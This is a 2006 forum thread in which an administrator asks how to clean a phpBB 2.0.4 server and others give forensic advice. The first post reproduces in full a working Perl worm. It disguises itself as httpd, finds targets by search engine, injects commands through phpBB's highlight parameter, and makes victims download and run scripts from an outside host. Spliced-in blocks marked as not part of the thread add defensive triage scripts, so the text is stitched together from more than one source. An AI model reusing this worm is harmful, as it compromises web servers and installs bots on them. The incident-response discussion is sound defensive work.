LinuxQuestions.org
Old 04-17-2006, 10:46 AM   #1
matthewchin
Member
 
Registered: Jun 2003
Posts: 40

Rep: Reputation: 15
Hacked - pls help


Dear All,

**** Please excuse me if this was NOT posted to the correct category ****

My phpBB (/var/www/html/phpBB2, running on FC3) wrongly allowed 777 and was attacked by this hacker
(ip=81.196.20.134).
/tmp/.666 and /tmp/.lick are invoked continuously, it seems, whenever phpBB is run.

This results in a substantial problem with sh (defunct) (zombie) processes.

I want expert advice:

1) how is it invoked?
2) how to STOP it?
3) for now I only deny the IP access to /var/www/html using .htaccess.

Matthew


------------------- lick.txt -------------------------

#### There is no patch for human stupidity #####
########### Romania #########################
###### Crash@WhiteHat.Cc ######

use strict;
use IO::Socket;
use IO::Handle;


my $process = '/usr/sbin/httpd';
$0="$process"."\0"x16;;
my $pid=fork;


sub fetch();
sub remote($);
sub http_query($);
sub encode($);

sub fetch(){
my $rnd=(int(rand(9999)));
my $s= (int(rand(1000)));
if ($rnd>1000) { $s= (int(rand(100)))}



my @str=(
"%22phpBB+2.0.4+%C2%A9+2001%2C+2002+%22",
"%22phpBB+2.0.4+%C2%A9+2001%2C+2002+%22+topic+777",
"viewtopic.php%3Ft",
"%22View+next+topic%22",
"%22View+previous+topic%22",
"viewtopic.php+%22Log+in+to+check+your+private+messages%22",
"%22Powered+by+phpBB%22+v-i-e-w-t-o-p-i-c-.-p-h-p",
"%22P-o-w-e-r-e-d+b-y+p-h-p-B-B%22",
"viewtopic.php+%22by+phpBB+2001%22",
"viewtopic.php+%22by+phpBB+2000%22",
"viewtopic.php+%22by+phpBB+2002%22",
"viewtopic.php+by+phpBB+2003%22",
"viewtopic.php+%22by+phpBB+2004%22",
"%22ALEKS+HACKED+YOUR+SYSTEM%22",
"viewtopic.php+%22by+phpBB+2005%22",
"viewtopic.php+%22by+phpBB+2006%22",
"intitle%3A%22%3A%3A+View+topic%22",
"viewtopic.php+%22+phpBB+Group%22",
"%22topic.php%3Ft%3D%22",
"%22%3A%3A+View+topic%22",
);

my $query="search.msn.com/results.aspx?q=";
$query.=$str[(rand(scalar(@str)))].$rnd;
$query.="&first=$s";

my @lst=();
my $page = http_query($query);
while ($page =~ m/<a href=\"?http:\/\/([^>\"]+)\"?>/g){
if ($1 !~ m/msn|cache|hotmail/){
push (@lst,$1);
}
}

return (@lst);
}

sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\nHost: $host\nAccept: */*\nUser-Agent: Mozilla/4.0\n\n ";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
};
return $page;

}

sub encode($) {
my $s = shift;
$s =~ s/(.)/"chr(".ord($1).")%252E"/seg;
$s =~ s/%252E$//;
return $s;
}



eval {fork and exit;};

my $iam=$ARGV[0];
my $oneday=time+3600;
my $page="";
my @urls;
my $url;






while(time<$oneday){
@urls=fetch();
foreach $url (@urls) {
if ($url !~ /viewtopic.php/) {next;}
$url =~ s/(.*\/viewtopic.php\?[t|p]=[0-9]+).*/$1/;
my $cmd=encode("perl -e \"print q(jSVowMsd)\"");
$url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";
$page = http_query($url);
if ( $page =~ /jSVowMsd/ ){
$url =~ s/&highlight.*//;
my $upload=$url;
$upload =~ s/viewtopic.*//;
$cmd="wget http://lakexxx.go.ro/xpl.txt -O /tmp/.lick;perl /tmp/.lick"; # set cmd
$cmd=encode("$cmd"); # set cmd
$url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";
$page = http_query($url);
$cmd="wget http://lakexxx.go.ro/bot.txt -O /tmp/.666;perl /tmp/.666;touch /tmp/.666";
$cmd=encode("$cmd"); # set cmd
$url =~ s/&highlight.*//;
$url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";
$page = http_query($url);
}

}
}
 
Old 04-17-2006, 11:41 AM   #2
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
1) how it is invoked?
Likely through a vulnerable version of phpBB, so the processes running on the system will be that of the user that Apache is run under (for Fedora it's usually "apache"). ps -U apache will give a listing of everything running under that user. Also take a look at your httpd logs in /var/log/httpd/access_log and see if you can find the exact commands that have been executed.

2) how to STOP ?
Kill off the rogue processes. If they keep respawning, try stopping Apache.

3) now I only deny from the ip for access /var/www/html using .htaccess.
I'd use iptables instead and completely ban the IP from all ports just in case you have some backdoor shell listening on another port. Use iptables -I INPUT -s X.X.X.X -j DROP

That may or may not help. If your system has been extensively compromised then simply adding an iptables rule likely will be ineffective. You'll need to do some extensive forensic analysis on the system in order to identify how significant the compromise was. Personally I consider any level of access to be significant enough to warrant a complete re-install, but some consider that excessive.

Start by taking a listing of all processes running on the system and of all network connections (netstat -pantu). Post any processes or connections that don't look normal or you don't know what they are. Take a look through the system logs, including /var/log/secure /var/log/messages and all of the httpd logs. Look for any strange logins in the output of last -i. Get a list of all SUID/SGID root files on the system with find / -perm 2000 -o -perm 4000. Look at /etc/passwd for any new users or users other than root with a UID of 0.
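Added example, not part of this thread or of Capt_Caveman's reply: a few shell helpers for the first-pass checks listed above. Each check reads command output on stdin so it can be run on the live host or against copies of ps/netstat/passwd output saved from it. The function names, the web-server user "apache" (Fedora's default for httpd) and the sample lines in the test are my own assumptions. One point worth knowing when reading ps: the lick.txt script posted above overwrites $0 with "/usr/sbin/httpd", so the bot shows up in ps under the same name as the real web server; the helper therefore compares the name ps shows with the binary actually mapped at /proc/PID/exe.

```shell
#!/bin/sh
# Added triage helpers (example code, not from the thread). Each function reads command
# output on stdin so it can be fed live ("proc_snapshot | proc_masquerade apache") or from
# files saved off the compromised host. "apache" as the httpd user is an assumption.

# The bot sets $0 to "/usr/sbin/httpd", so ps's command column cannot be trusted. Compare
# the argv[0] shown by ps with the real binary in /proc/PID/exe, for one user's processes.
# Input lines: "<user> <pid> <argv0> <exe path>"  (produced by proc_snapshot below).
proc_masquerade() {
    awk -v u="$1" '
        function base(p) { sub(/.*\//, "", p); return p }
        $1 == u && base($3) != base($4) {
            printf "pid %s shows %s but runs %s\n", $2, $3, $4
        }'
}

# Build the four-column snapshot from a live Linux /proc (run as root so every exe resolves).
proc_snapshot() {
    for p in /proc/[0-9]*; do
        pid=${p#/proc/}
        user=$(stat -c %U "$p" 2>/dev/null) || continue
        argv0=$(tr '\0' ' ' < "$p/cmdline" 2>/dev/null | awk '{print $1}')
        exe=$(readlink "$p/exe" 2>/dev/null) || continue
        echo "$user $pid ${argv0:--} $exe"
    done
}

# Accounts other than root that have UID 0 (third field of /etc/passwd).
uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }'
}

# Lines of "netstat -pantu" output involving a given address (the attacking IP, or any
# address you do not recognise): protocol, local, foreign, state, owning PID/program.
# UDP lines carry no state column, so "state" is the PID/program for those.
conns_to() {
    awk -v a="$1" 'index($0, a) { print $1, $4, $5, $6, $NF }'
}

# Set-UID / set-GID files on local filesystems. The leading "-" in -perm -4000 means
# "this bit is set, whatever the others are", which is what a SUID audit needs.
suid_sgid_files() {
    find "${1:-/}" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
}

# Live run as root:  sh triage.sh apache
if [ "$#" -eq 1 ]; then
    echo "== processes of $1 whose binary differs from their name"
    proc_snapshot | proc_masquerade "$1"
    echo "== extra UID 0 accounts"
    uid0_accounts < /etc/passwd
    echo "== SUID/SGID files"
    suid_sgid_files /
fi
```

Save the functions to a file and source them so that saved evidence can be re-examined later (`proc_masquerade apache < ps-snapshot.txt`); anything the helpers flag is a lead for the log review, not proof by itself.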
 
Old 04-17-2006, 10:08 PM   #3
matthewchin
Member
 
Registered: Jun 2003
Posts: 40

Original Poster
Rep: Reputation: 15
Thanks Capt Caveman,

2) how to STOP ?
Kill off the rogue processes. If they keep respawning, try stopping Apache.

I meant: how can I stop/remove those rogue processes from being invoked? I cannot locate where and how they are started..... any hints?
 
Old 04-17-2006, 10:45 PM   #4
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
They're likely either started by a master script that is already running, directly through phpBB, or possibly by cron. If you kill them do they respawn automatically or do they only start up at certain times (like on boot or at a certain time of day)?

Who owns the rogue processes (do 'ps aux' and see who the owner is)? Also run pstree and take a look at the rogue processes to see if they are being run by some other script.

It's probably a good idea to remove this system from the internet at least until you can verify that it's clean. Plus if the script is being started remotely using the phpBB exploit, then the cracker can simply just restart it.
 
Old 04-18-2006, 12:29 AM   #5
matthewchin
Member
 
Registered: Jun 2003
Posts: 40

Original Poster
Rep: Reputation: 15
Thanks Capt Caveman

The processes keep starting recursively. I just want to stop this, but I am still unable to locate how they are started. More hints?

Matthew
 
Old 04-18-2006, 02:12 AM   #6
MS3FGX
LQ Guru
 
Registered: Jan 2004
Location: NJ, USA
Distribution: Slackware, Debian
Posts: 5,852

Rep: Reputation: 361
If you reboot the machine with Apache and all of your services turned off, do the processes come back up?

If so, then they must be getting started from the init scripts, cron, or perhaps inetd.
 
Old 04-18-2006, 05:08 AM   #7
matthewchin
Member
 
Registered: Jun 2003
Posts: 40

Original Poster
Rep: Reputation: 15
Thanks MS3FGX,

Correct, they come up again after each reboot, and cause the machine to eventually slow down.

As too many files exist, any hints for easier identification of them?

Thanks,
Matthew
 
Old 04-18-2006, 06:44 PM   #8
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
Could you post a full list of all the processes on the system (ps aux)? (Please post this regardless of other data)

What does rpm -Va produce?

Does /etc/crontab or /etc/cron.d/ contain any references to .lick?

Does /var/log/messages contain anything relevant?

If you start in single-user mode, do the processes still appear?
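Added example, not part of this thread: the "comes back after every reboot" symptom means something outside Apache restarts the scripts, and replies #4, #6 and #8 name the places to look (cron, init scripts, inetd, and rpm -Va for replaced binaries). The helpers below grep those locations for a pattern and filter rpm -Va down to package-owned binaries whose checksum changed. Paths follow the Fedora Core layout; the demo tree and the rpm -Va lines in the test are constructed samples, and the function names are my own.

```shell
#!/bin/sh
# Added example (not from the thread): hunt for whatever restarts /tmp/.lick and /tmp/.666
# after a reboot. Paths are the Fedora Core layout; the demo tree is constructed data.

# Grep the usual persistence locations (system and per-user cron, SysV init scripts,
# rc.local, inittab, (x)inetd) for a pattern. "$2" lets you point at a mounted copy of the
# suspect root filesystem instead of the live one, which is the safer way to examine it.
persistence_refs() {
    pattern="$1"; root="${2:-}"
    for f in "$root/etc/crontab" "$root/etc/cron.d" "$root/var/spool/cron" \
             "$root/etc/rc.d" "$root/etc/rc.local" "$root/etc/inittab" \
             "$root/etc/xinetd.d" "$root/etc/inetd.conf"; do
        [ -e "$f" ] && grep -rl -e "$pattern" "$f" || true
    done
}

# Reduce "rpm -Va" output to package-owned binaries whose MD5 no longer matches (the third
# character of the flag field is "5"). Config files (marked "c") are skipped because they
# are expected to differ; a changed ps, netstat or httpd binary is not.
rpm_va_modified() {
    awk 'substr($1, 3, 1) == "5" && $2 != "c" && $NF ~ /^\/(usr\/)?s?bin\// { print $NF }'
}

# Constructed demo tree: one crontab entry in the style the thread describes, plus benign
# entries that must not be reported.
demo_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/etc/cron.d" "$d/etc/rc.d"
    printf '# constructed sample\n* * * * * root perl /tmp/.lick >/dev/null 2>&1\n' > "$d/etc/crontab"
    printf '0 * * * * root /usr/sbin/logrotate /etc/logrotate.conf\n' > "$d/etc/cron.d/logrotate"
    printf '#!/bin/sh\ntouch /var/lock/subsys/local\n' > "$d/etc/rc.d/rc.local"
    echo "$d"
}

# "sh persist.sh demo" runs against the constructed tree; "sh persist.sh live" (as root)
# checks the running host, including rpm's verification of its own binaries.
case "${1:-}" in
    demo) root=$(demo_tree); persistence_refs '/tmp/\.' "$root"; rm -rf "$root" ;;
    live) persistence_refs '/tmp/\.'; rpm -Va | rpm_va_modified ;;
esac
```

Because rpm -Va relies on the rpm binary and database on the same host, a clean result from a compromised box is not conclusive; running the same check against a mounted copy from known-good boot media is the stronger version.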
 
Old 04-19-2006, 12:18 AM   #9
matthewchin
Member
 
Registered: Jun 2003
Posts: 40

Original Poster
Rep: Reputation: 15
Finally removed phpBB 2.0.4 and reinstalled the new version. - FIXED.
Thank you all for help.
 